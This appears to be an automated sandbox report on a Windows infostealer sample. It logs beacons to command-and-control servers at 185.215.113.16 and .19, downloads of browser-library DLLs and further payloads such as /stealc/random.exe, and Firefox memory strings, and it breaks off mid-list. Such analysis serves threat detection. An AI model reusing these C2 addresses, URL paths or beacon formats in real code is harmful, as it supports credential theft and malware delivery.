Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: Joe Sandbox View IP Address: 85.28.47.31
Source: Joe Sandbox View IP Address: 185.215.113.19
Source: Joe Sandbox View ASN Name: GES-ASRU
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle, 0_2_00405000
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ?disabled=getCanStageUpdates - unable to apply updates because another instance of the application is already handling updates for this installation.https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=$locale&region=$region&count=30https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ?disabled=getCanStageUpdates - unable to apply updates because another instance of the application is already handling updates for this installation.https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=$locale&region=$region&count=30https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2954167196.000001B1066E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.2909846838.000001F5FECF0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation equals www.youtube.com (Youtube)
Source: 8e8f4571c5.exe, 0000001C.00000002.3375734319.0000000005403000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2903172052.0000018A47990000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2952630491.000001B104590000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2903172052.0000018A47990000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account<A{N equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2953298471.000001B104803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account~ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2952598665.000001B104580000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -os-restarted https://www.youtube.com/accountH equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2996759132.000001B117583000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2989528701.000001B116803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: .S........[tlsflags0x00000000]www.youtube.com:443^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2989528701.000001B1168B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3018521435.000001B11DD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8:https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2994122055.000001B116B81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2994122055.000001B116B97000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3000161016.000001B1177A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2987356094.000001B11659D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2988472196.000001B116624000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2989528701.000001B1168B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3018521435.000001B11DD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: :https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000003.2909698266.000001B107465000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2959579682.000001B107486000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2909956595.000001B107486000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, 
GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2996759132.000001B1175D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2952630491.000001B104590000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.2909846838.000001F5FECF0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account--attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2903172052.0000018A47990000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/accountzA{ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.2909846838.000001F5FECF0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevationC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2952630491.000001B104590000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/accountC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2903172052.0000018A47990000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/accountC:\Program Files\Mozilla Firefox\firefox.exewinsta0\defaultxA{ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2903912469.0000018A49530000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: G8p8https://www.youtube.com/account --attempting-deelevationUser equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000003.2910203943.000001B107454000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2909110092.000001B107454000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account$ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2959579682.000001B1073B0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2910203943.000001B107454000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2909110092.000001B107454000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2953298471.000001B104803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accounthttps://www.youtube.com/account@ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2996759132.000001B1175D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: O^partitionKey=%28https%2Cyoutube.com%29,:https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: 8e8f4571c5.exe, 00000018.00000002.3383993209.0000000006A26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000003.2909414064.000001B111826000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: START_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHRE equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2986979517.000001B116409000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2986979517.000001B116405000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", 